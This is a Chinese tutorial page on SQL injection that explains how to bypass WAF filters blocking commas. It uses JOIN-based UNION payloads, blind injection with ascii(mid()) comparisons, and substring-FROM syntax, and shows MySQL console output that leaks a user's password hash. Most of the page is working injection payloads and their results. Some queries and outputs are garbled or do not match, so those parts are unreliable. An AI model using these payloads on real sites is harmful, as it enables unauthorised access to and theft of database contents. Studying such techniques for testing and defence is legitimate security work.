2. 程式人生 > 資料庫 >SQL注入技巧之顯注與盲注中過濾逗號繞過詳析

SQL注入技巧之顯注與盲注中過濾逗號繞過詳析

阿新 發佈:2020-01-09

前言

sql注入在很早很早以前是很常見的一個漏洞。後來隨著安全水平的提高,sql注入已經很少能夠看到了。但是就在今天,還有很多網站帶著sql注入漏洞在執行。下面這篇文章主要介紹了關於SQL注入逗號繞過的相關內容,分享出來供大家參考學習,下面話不多說了,來一起看看詳細的介紹吧

1.聯合查詢顯注繞過逗號

在聯合查詢時使用 UNION SELECT 1,2,3,4,5,6,7..n 這樣的格式爆顯示位,語句中包含了多個逗號,如果有WAF攔截了逗號時,我們的聯合查詢不能用了。

繞過

在顯示位上替換為常見的注入變數或其它語句

union select 1,3;

union select * from ((select 1)A join (select 2)B join (select 3)C);

union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),@@datadir))C);

在資料庫中演示聯合查詢

UNION開始是我們在URL中注入的語句,這裡只是演示,在實際中如果我們在注入語句中有逗號就可能被攔截

mysql> select user_id,user,password from users union select 1,3;
+---------+-------+----------------------------------+
| user_id | user | password  |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1 | 2 | 3  |
+---------+-------+----------------------------------+
2 rows in set (0.04 sec)

不出現逗號,使用Join來注入

mysql> select user_id,password from users union select * from ((select 1)A join (select 2)B join (select 3)C);
+---------+-------+----------------------------------+
| user_id | user | password  |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1 | 2 | 3  |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)

查詢我們想要的資料

mysql> select user_id,password from users union select * from ((select 1)A join (select 2)B join (select group_concat(user(),@@datadir))C);;
+---------+-------+-------------------------------------------------+
| user_id | user | password   |
+---------+-------+-------------------------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1 | 2 | [email protected] dvwa c:\phpStudy\MySQL\data\ |
+---------+-------+-------------------------------------------------+
2 rows in set (0.08 sec)

2.盲注中逗號繞過

MID 和substr 函式用於從文字欄位中提取字元

mysql> select mid(user(),1,2);
+-----------------+
| mid(user(),2) |
+-----------------+
| ro |
+-----------------+
1 row in set (0.04 sec)

查詢資料庫使用者名稱第一個字元的ascii碼

mysql> select user_id,password from users union select ascii(mid(user(),2)),3;
+---------+-------+----------------------------------+
| user_id | user | password  |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 114 | 2 | 3  |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)

盲注,通過猜ascii值

mysql> select user_id,password from users where user_id=1 and (select ascii(mid(user(),2))=115) ;
Empty set

mysql> select user_id,2))=114) ;
+---------+-------+----------------------------------+
| user_id | user | password  |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.04 sec)

逗號繞過SUBTTRING 函式

substring(str FROM pos)

從字串str的起始位置pos 返回一個子串

mysql> select substring('hello' from 1);
+---------------------------+
| substring('hello' from 1) |
+---------------------------+
| hello  |
+---------------------------+
1 row in set (0.04 sec)

mysql> select substring('hello' from 2);
+---------------------------+
| substring('hello' from 2) |
+---------------------------+
| ello  |
+---------------------------+
1 row in set (0.03 sec)

注入

mysql> select user_id,password from users where user_id=1 and (ascii(substring(user() from 2))=114) ;
Empty set
//substring(user() from 2)為o
//o的ascii為111,
mysql> select user_id,password from users where user_id=1 and (ascii(substring(user() from 2))=111) ;
+---------+-------+----------------------------------+
| user_id | user | password  |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.03 sec)

總結

以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作具有一定的參考學習價值,如果有疑問大家可以留言交流,謝謝大家對我們的支援。

相關推薦

SQL注入技巧過濾逗號繞過

前言 sql注入在很早很早以前是很常見的一個漏洞。後來隨著安全水平的提高,sql注入已經很少能夠看到了。但是就在今天,還有很多網站帶著sql注入漏洞在執行。下面這篇文章主要介紹了關於SQL注入逗號繞過的相關內容,分

sql left join 去重_混入了一些奇怪的東西?SQL技巧資料去重

技術標籤:sql left join 去重sql sum 去重sql 去重並統計總數sql 去重查詢sql 去重求和sql 結果去重

十分鐘學會Lua三:程式設計技巧閉包模式匹配

三:程式設計技巧 1、 閉包: 簡單來說,一個閉包就是一個函式外加能夠使該函式正確地訪問非區域性變數所需的其他機制。

學習筆記二十:Mssql手延時型

延時函式WAITFOR DELAY WAITFOR是SQL ServerTransact-SQL提供的一個流程控制語句。它的作用就是等待特定時間,然後繼續執行後續的語句。它包含一個引數DELAY,用來指定等待的時間。如果將該語句成功注入後,會造成

預防SQL注入攻擊我見

1、 SQL注入攻擊的本質:讓客戶端傳遞過去的字串變成SQL語句,而且能夠被執行。

Web安全SQL注入攻擊技巧防範(轉)

add by zhj: 作者總結了防止SQL的幾種辦法,終極辦法是資料庫(如MySQL)自身提供的預編譯功能,即先將SQL語句的引數用?替換,發給資料庫進行預編譯,得到編譯結果後再傳入引數替換?,執行SQL

[sql 注入] insert 報錯注入延時

insert注入技巧在於如何在一個欄位值內構造閉合。 insert 報錯注入 演示案例所用的表:

初學Web安全sql注入(四)—— (1)

當你的輸入沒有回,也沒有報錯的時候,但是輸入正確和錯誤的值時,頁面有不同表現時,這時候我們可以嘗試使用布林

十六:SQL注入查詢方式及報錯

在很多入時,有很多注入會出現無回的情況,其中不回的原因可能是SQL查詢語句有問題,這時候我們需要用到相關的報錯或者盲注進行後續操作,同時作為手工注入的時候,需要提前瞭解SQL語句能更好的選擇對應的

SQL注入查詢方式及報錯

前言 當進行SQL注入時,有很多注入會出現無回的情況,其中不回的原因可能是SQL語句查詢方式的問題導致,這個時候我們需要用到相關的報錯或盲注進行後續操作,同時作為手工入時,提前瞭解或預知其SQL語句大概寫

SQL Server手延時型時間

近來處理安全問題遇到的sql注入: 延時函式 WAITFOR DELAY WAITFOR是SQL ServerTransact-SQL提供的⼀個流程控制語句。它的作⽤就是等待特定時間,然後繼續執⾏後 續的語句。它包含⼀個引數DELAY,⽤來指定等待的時

SQL注入布林註腳本

在做ctf時,我們會碰到很多的SQL注入的題目,可能會有各種各樣的過濾,有時候sqlmap會無法滿足我們的需求,無法繞過各種各樣的注入,所以我們需要手寫註腳本來對注入點進行注入,自己寫指令碼的好處就是我們可以根

SQL注入漏洞--和寬位元組注入

注入的一種,指的是在不知道資料庫返回值的情況下對資料的內容進行猜測,實施SQL注入一般分為布林和基於時間的和報錯的

END的學習 SQL注入繞過 and POST基於時間和布林的

SQL注入繞過 1,大小寫繞過 2,雙寫繞過 3,編碼繞過 可以使用URL編碼,ASCII,HEX,unicode編碼繞過

一道題講懂SQL / [第一章 web入門]SQL注入-2

概述 本題是一個題,可以基於布林也可以基於時間,如果不會的話可以根據提示在網址後面加一個?tips=1降低難度成為一個基於報錯的

SQL注入——

前言 在某些情況下後臺會使用錯誤訊息遮蔽來遮蔽報錯,同時無法根據報錯資訊來進行判斷,在這時我們需要用到。而分為兩種,一種為布林,一種為時間

滲透測試sql注入驗證安全攻擊效能

由於滲透測試牽涉到安全性以及攻擊性,為了便於交流分享,本人這裡不進行具體網址的透露了。

SQL注入--

SQL注入-- 使用的原因,是管理員關閉了回,無法獲知報錯情況 0x00

WEB安全-SQL注入漏洞測試(時間)

前言 這是SQL注入的第八篇,之前忙著學校的考試,現在結束了就可以再專心打靶場一段時間了

學習筆記二十四:的快速獲取資料DNSlog注入

用DNS的log功能來突破盲注速度慢的限制。 技術說明: DNSlog⼊屬於帶外通訊的⼀種,英⽂:Out of Band,簡稱:OOB。我們之前的⼊都是在同⼀個通道上⾯ 的,⽐如我們之前的聯合查詢⼊,都是做HTTP請求,然後得